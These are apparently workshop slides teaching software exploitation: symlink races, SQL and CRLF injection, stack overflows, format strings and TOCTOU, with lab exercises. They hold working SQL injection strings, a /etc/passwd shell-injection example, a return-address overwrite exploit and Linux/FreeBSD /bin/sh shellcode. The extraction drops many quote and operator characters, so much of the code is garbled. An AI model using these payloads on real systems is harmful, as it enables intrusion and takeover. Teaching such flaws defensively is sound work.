Basics in program manipulation hacking

1
Basics in program manipulation (hacking)

• Ing. R.L.R. Huisman

2
Why should we should check software ?
Second Hidden Title

• Ing. R.L.R. Huisman

3
Index

• What is program manipulation ?
• Organizational matters
• Injections (SQL and CLRF)
• Buffer overflow/underflow
• Format String bugs
• TOCTOU
• Conclusion
• Pointers

4
Who the is that ?

• Rolf Huisman, 23 years, girlfriend for 3 years
• Computers since I was 5
• Bachelor of ICT (HIO) Saxion Enschede
• Currently Graduating for
• Master of Computer Sience (Here on the UT) ?
• Technical advice to technical issues to many
  companies (including the Saxion Hogeschool and
  Inter-Actief)
• Former Technical Manager for the Inter-Actief
  Web-Site System, ACM member

5
Program manipulation ?

• Manipulate a program so its behavior differs from
  its intended behavior
• Normally used in combination with social
  engineering while penetration testing.
• (Penetration as in security, not girlfriend)
• This Presentation, just the technical stuff,
  leaving out the user as target (no XSS, etc)

6
Program manipulation ?

• Negative image because of crackers/hackers
• University of Texas loses 197,000 records
• Sql Injection (24-04-2006)
• 200 Websites using zero day exploit (IE)
• Buffer overflow (28-03-2006)
• http//www.securityfocus.com/

7
Program manipulation ?

• My opinion
• Teach people what goes wrong, so they think about
  it before doing wrong
• Therefore I said yes to this.

8
Organizational matters

• Get permission, otherwise its illegal
• You already can get 6 Months if nothing bad
  happens.
• In case of a hospital shutdown e.g. you could get
  2 Years (Involuntary Manslaughter)
• RESPECT THE LAW
• In general article 138a of the criminal code

9
Organizational matters

• 138a of the Criminal Code (new Version)

10
Organizational matters

• 138a of the Criminal Code (new Version)
• SO GET PERMISSION, OR DONT DO AT ALL

11
Organizational matters

• 138a of the Criminal Code (new Version)
• SO GET PERMISSION, OR DONT DO

12
Organizational matters

• What is allowed to hack
• The designated server (ip lttodogt)
• What isnt allowed to Hack
• THE REST of the world

13
Organizational matters

• Great power comes with greater responsibility
  (uncle Ben, Spiderman)
• If you screw up, misuse or do something else with
  this knowledge its your own responsibility
• I, CS, UT and Inter-Actief dont accept liability
• So anyone who doesnt agree to all of this
• !!! LEAVE NOW !!!

14
Organizational matters

• Please raise your hand if this applies to you.
• Who has never programmed ?
• This may be a little bit difficult, because we
  arent talking social engineering. But hey, new
  day, new chances.

15
Organizational matters

• Please raise your hand if this applies to you.
• Who has never programmed in C or C
• Its not a shame, because lots of people havent.
  But you will never look with the same eyes to
  your language again.

16
Organizational matters

• Please raise your hand if this applies to you.
• Who doesnt know SQL
• Some things can be translated to textfiles as
  well. But since many make use of sql, make sure
  youl learn it one day.

17
Organizational matters

• Please raise your hand if this applies to you.
• Dont know linux or unix

18
Organizational matters

• Please raise your hand if this applies to you.
• Dont know linux
• Dont care. Stuff applies to every OS.
• But remember while experimenting buffer
  overflows are often protected nowdays

19
Basic hacking techniques

• There are a few basic techniques (Bugs)
• Symlink races
• Input validation
• Buffer overflows
• Time-of-check-to-time-of-use (TOCTOU)
• These can by combined with other techniques

20
Basic hacking techniques

• Symbolic races
• Program makes a temporary file
• Program just overwrites it
• Make a symlink already with that name
• Program overwrites targetfile

21
Basic hacking techniques

• Example
• One Setuid program (has god rights P)
• Creates the file /tmp/temp and adds
• Attacker creates symlink from the temp file to
  /etc/.rhosts
• When the file is removed, symlink is gone
• Since .rhosts contains so, logons as root
  without a password

22
Basic hacking techniques

• Input validation
• Shell metacharacters
• Injections
• Sql
• CRLF
• Format String bugs (after buffer overflows)

23
Basic hacking techniques

• Program is executed with parameters like
• Exec(./prog arg)
• When arg contains shell metacharacters
• Like
• Other commands can be executed
• Arg cat /etc/passwd
• Exec(./prog cat /etc/passwd)

24
Basic hacking techniques

• Injection
• Inserting extra information so its get processed
  different.
• Most common used injection is SQL injection.
• SQL injections are often the reason why
  information has leaked or a DB-server is hacked
  in a company

25
Basic hacking techniques

• We have a function, anyone see a problem ?
• Bool val (string name, string passwd)
• String query select name from users
• where name name
• and passwd passwd
• ResultSet set doquery(query)
• return set.hasElements()

26
Basic hacking techniques

• We have a function, anyone see a problem ?
• Bool val (string name, string passwd)
• String query select name from users
• where name name
• and passwd passwd
• ResultSet set doquery(query)
• return set.hasElements()
• No checks, means money P

27
Basic hacking techniques

• rolf,apple whould result in
• Select name from users where name rolf and
  passwd apple
• But root, or 1 1 -- would result in
• Select name from users where name root and
  passwd or 1 1--

28
Basic hacking techniques

• rolf,apple whould result in
• Select name from users where name rolf and
  passwd apple
• But root, or 1 1 -- would result in
• Select name from users where name root and
  passwd or 1 1--
• Thus the system would return elements

29
Basic hacking techniques

• So lets try this ourself
• IP address http//130.89.8.33 test server
• Example 1
• In example 2, he did a naive fix
• He replaced al by \ try that one as well

30
Basic hacking techniques

• Example 2
• Naive fix, replace by \
• Hint what does \\ mean

31
Basic hacking techniques

• Example 2 solution
• Use \ behind each other.
• \ get replaced by \\ where the \\ is seen as a
  \ and the is correctly noticed.
• So
• root,\ or 1 1 --

32
Basic hacking techniques

• Example 3 is a lookup which has the same flaw.
• The items table
• The completed search sql string is
• Select name from items where id 8
• Try to read the usernames from table users
• Hint, Union can combine tables of different names
• Like select 1 from a union select 2 from b

33
Basic hacking techniques

• Example 3
• You dont need to use a because its expecting
  a number
• or 11 would result in returning the whole
  search table, as in not good
• or 1 1 union select name from users --
• Returns the names.
• One could even use system calls in sql (try this
  home)
• Conclusion security is needed everywhere, even
  parts that dont handle authorisation

34
Basic hacking techniques

• So what about other injections ?
• CRLF (clear line feed) injections
• The combination character 10 and 13 (\r\n) behind
  each other is considered a return
• (Windows endline vs unix vs old apple)

35
Basic hacking techniques

• CRLF injections
• private StringBuffer log new StringBuffer()
• void log(String message)
• log.append(System.currenttimemillis())
• log.append()
• log.append(message)
• log.append(\n)

36
Basic hacking techniques

• CRLF injections
• private StringBuffer log new StringBuffer()
• void synchronized log(String message)
• log.append(System.currentTimeMillis())
• log.append()
• log.append(message)
• log.append(\n)
• Not filtered

37
Basic hacking techniques

• void logAccessDenied(String userName)
• log(userName doesnt have access)
• With username
• Reddog logged off\n13212131Charly
• Would result in the log showing
• 13212130Reddog logged off
• 13212131Charly doesnt have access
• Thus creating the illussion reddog wasnt there

38
Basic hacking techniques

• Example 4
• Try this yourself at the server
• Create a false log entry which cant be
  destinguised.

39
Basic hacking techniques

• Example 4 Is the other way around P
• Charly\n13212131Reddog Logged off
• And yes, I do filter on html tags

40
Basic hacking techniques

• Buffer overflows
• Hardest problem to spot thus most commonly found
  security feature
• More difficult to exploit then insertions
• Buffer overflows is a type of exploits
• Public known term buffer overflows should be
  stack smashes (official term)
• Based on the way code is executed
• Sometimes can be countered by NX and stack
  protectors (DEP, canary, non executable stack)

41
Basic hacking techniques

• Memory ordering in a Process
• 3 Elements
• Stack
• Data (or the heap)
• Text (readonly)

Text
Data
Stack
42
Basic hacking techniques

• Memory ordering in a Process
• 3 Elements
• Stack
• Data
• Text
• Growing

Text
Data or the heap
Stack
43
Basic hacking techniques

• So, whats this stack used for
• Calling of functions
• If a function calls an other function, it puts it
  on the stack, hence execution stack

44
Basic hacking techniques

• Conceptualy When a Computer adds 1 1

1
1
45
Basic hacking techniques

• Conceptualy When a Computer adds 1 1
• It pops the items of the stack
• Does its calculation
• And puts te result on the stack

2
46
Basic hacking techniques

• When a program calls a function
• It pushes old execution location on the stack
  with the StackRegister pointing to it

Old Location
47
Basic hacking techniques

• When a program calls a function
• It pushes the old execution location on the
  stack, and keeps on going

1
1
2
Old Location
Old Location
48
Basic hacking techniques

• When returning a function, the program returns to
  the location, designated by the stack
• Setting the execution pointer to the old location.

2
Old Location
49
Basic hacking techniques

• This stack in memory is flat
• Growing from right to left
• Where the variables are written from left to right

Old Location
2
50
Basic hacking techniques

• So you have the stack with reserved static room
  for the variable
• When supplying a to long variable
• You override the return pointer

Room
Return Pointer
Padding Frame p
Rest stack
Overflow
Return Pointer
Overflow
Return Pointer
Rest stack
51
Basic hacking techniques

• Then the code the return pointer is pointing to,
  gets executed
• Since this is your pointer, your code gets
  executed

Bad Code P
Return Pointer
Rest stack
52
Basic hacking techniques

• Exception STATUS_ACCESS_VIOLATION at
  eip004010C4
• eax00000000 ebx00000004 ecx7C90FB71
  edx0000000D esi6115E6D9 edi61102C18
  ebp00224010 esp0022EEA0 programC\cygwin\home\r
  eddog\prog1a.exe, pid 884, thread main
• cs001B ds0023 es0023 fs003B gs0000 ss0023
• In the dump
• Execution pointer (what am I executing)
• EIP
• Stack Pointer (location of return pointer)
• ESP

53
Basic hacking techniques

• So, how can we do that ? Our target
• int main()
• int rechten 0
• leesIets()
• if (rechten)
• secure
• printf("We will transfer the money\n")
• else
• printf("Forget it (p)\n", secure)

54
Basic hacking techniques

• So, how can we do that ?
• int main()
• int rechten 0
• leesIets()
• if (rechten)
• secure
• printf("We will transfer the money\n")
• else
• printf("Forget it (p)\n", secure)

55
Basic hacking techniques

• So, how can we do that ?
• int main()
• int rechten 0
• leesIets()
• if (rechten)
• secure
• printf("We will transfer the money\n")
• else
• printf("Forget it (p)\n", secure)

56
Basic hacking techniques

• Executing on I386 freebsd
• echo ./prog1a
• Forget it (0x804858e)
• Hmm no rights to transfer money
• But the memmory location of secure on freebsd
  0x804858e

57
Basic hacking techniques

• So, how can we use that ?
• int main()
• int rechten 0
• leesIets() Bug
• if (rechten)
• secure
• printf("We will transfer the money\n")
• else
• printf("Forget it (p)\n", secure)

58
Basic hacking techniques

• void leesIets()
• char input128
• static int c 0
• while ( read(0, input c, 1) 1 ) 0

59
Basic hacking techniques

• void leesIets()
• char input128
• static int c 0
• while ( read(0, input c, 1) 1 ) 0

60
Basic hacking techniques

• int pointer 0x804858e //address of secure
• int main()
• write(1, buf, 128) // buffer
• write(1, buf, 8) // padding (optional)
• write(1, buf, 4) // stack frame (optional)
• write(1, pointer, 4) // return adress
• //Note pointer gives e8850408

61
Basic hacking techniques

• Execution Freebsd (Intel x86)
• ./prog1b ./prog1a
• We will transfer the money
• Segmentation fault (core dumped)
• Execution Windows XP SFU with DEP turned off
• ./prog1b ./prog1a
• We will transfer the money
• Segmentation fault (core dumped)

62
Basic hacking techniques

• Example 5 Try it yourself
• Use backslash hex numbers to create your
  characters, and oveflow it P
• e.g. \x00\x00 two zero characters
• A character is one byte (8bit)
• Target machine is a Intel x86 with 32 bit
  pointers
• E.G. Pointer 0x4010ca \xca\x10\x40\x00

63
Basic hacking techniques

• Example 5
• If it works, nicely done, you understood it.
• If it doesnt, try running without the exploit,
  see any differences ?
• Hint, one machine isnt like the other. Maybee
  its not running freebsd

64
Basic hacking techniques

• Example 5
• The example runs windows
• So you need to point the pointer to a different
  location.
• Thats why we needed that address.
• It was changed for the windows version.

65
Basic hacking techniques

• But I want execute my own code
• You just put the executing code in the overload
  code and point to it.
• This is code called The payload

Return Pointer
Own Code
66
Basic hacking techniques

• But, where to point ?
• Guessing most of the time
• But to allow more inaccurate pointer
• Just add NOPs, There (\x90 x86)
• And add the return pointer more often

Return Pointer
Own Code
Return Pointer
Return Pointer
NOPs
67
Basic hacking techniques

• Most of time shared payloads
• "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\
  x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc
  d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\
  xff/bin/sh\xeb\xeb\xeb
• Most common payload, opens a shell in linux

68
Basic hacking techniques

• Most of time shared payloads
• "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
• "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
• "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
• "\x53\x50\xb0\x3b\xcd\x80
• Most common payload, opens a shell in freebsd

69
Basic hacking techniques

• Most of time shared payloads
• "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e"
• "\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
• "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
• "\x53\x50\xb0\x3b\xcd\x80
• Shellcode contains memmory addresses,
• Because stacks memmory mapping differs per OS
  match your payload with your targets OS
• Otherwise you will get memmory violations

70
Basic hacking techniques

• Special things to take care
• Freebsd allows just 64 nops
• Windows is different then Windows Cygwin
• Openbsd has a randomized stack
• Solaris 9 the location is different then 8
• Sparc has other opcodes

71
Basic hacking techniques

• Example 6 Try this yourself, target
• void leesIets()
• char input128
• static int c 0
• printf(Location of input p,input)
• while ( read(0, input c, 1) 1 ) 0
• \x00\xee\x22\x00
• Int main()leesIets() //Try to open a shell

72
Basic hacking techniques

• Example 6
• Nops (max 64) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\
  x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x0
  8\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\
  xe8\xdc\xff\xff\xff/bin/sh\xeb\xeb\xeb return
  pointers

73
Basic hacking techniques

• Heap overflows
• Same thing, but in the heap memmory
• More difficult to exploit, because you need to
  create another stack overflow to change the
  execution pointer

74
Basic hacking techniques

• Buffer Underrun
• Buffer is filled the other way arround
• Usualy an attempt to not get buffer overflows.
  But essentialy a heap overflow

Stack
75
Basic hacking techniques

• Format string attack
• More variations on the buffer overflow
• Easy to spot, hard to exploit
• Found in 1999

76
Basic hacking techniques

• The mistake
• void function (char hello)
• printf(hello)
• printf(hello) should be printf(s,hello)
• Why is this bad ?

77
Basic hacking techniques

• Why is this bad ?
• The compiler
• printf (s, string) gives a pointer on the
  stack
• Printf (string) gets interpreted code
• With features like
• p buffer location on the stack
• x print decimals

78
Basic hacking techniques

• printf (Its \x25d\n", 23)

23
Rest
Printf
79
Basic hacking techniques

• printf (Its \x25d\n", 23)
• printf ("ssssssssss")

23
Rest
Printf
Rest
Printf
80
Basic hacking techniques

• Why does this happen ?
• Broken by design
• Normaly
• The arguments for printf are put on the stack
• Printf is called
• Our case
• Format string is on the stack
• Printf is called.
• But printf doesnt know how big its arguments are

81
Basic hacking techniques

• Key 08x
• printf("\xc0\xc8\xff\xbf_08x.08x.08x.08x.08x.
  n")
• Overrides the pointers, rest the same

82
Basic hacking techniques

• Time-of-check-to-time-of-use (TOCTOU)
• Known since 1996 but realy rediscovered in (2004)
  
• Going to hear a lot about them in the future
• Change the world in the time between checking
  and executing

83
Basic hacking techniques

• TOCTOU
• Target Code
• if(hasAccess(file))
• stream open(file,O_RDONLY)
• Whats wrong ????

84
Basic hacking techniques

• TOCTOU
• Target Code
• if(hasAccess(file))
• stream open(file,O_RDONLY)
• It takes time between the access and the open

85
Basic hacking techniques

• Exploiting
• file /tmp/temp //symlink to own file
• if(hasAccess(file))
• //change symlink to target
• stream open(file,O_RDONLY)
• Main trick, getting timing right

86
Basic hacking techniques

• Create a maze with symlinks keeping the os busy,
  pumping the machine with processes so it slows
  down

87
Basic hacking techniques

• Create a maze with symlinks keeping the os busy,
  pumping the machine with processes so it slows
  down
• Right tactics, 70 chance of entry

88
REMEMBER

• GET PERMISSION first, then try.
• The government is itching to get a hacker
  prosecuted (good pr). So there itching to arrest
  anyone stepping out of line.
• The permission to hack the server are now
  revoked. Please do not try to hack that IP
  anymore, this server isnt there anymore

89
Conclusions

• Try to think beyond the obvious
• Dont believe in security through obscurity
• Try to program defensively
• Review code by other people and look for these
  kinds of mistakes (you will be more able to find
  them since you know them)
• And if possible, use managed languages and/or
  stack/heap protectors

90
Pointers

• Buffer overflows in more detail
• www.maths.leeds.ac.uk/read/bofs.html
• TOCTOU
• www.cs.berkeley.edu/nks/papers/races-usenix05.pdf
  
• General news
• www.securityfocus.com
• This presentation
• wwwhome.cs.utwente.nl/huismanrlr/inter-actief/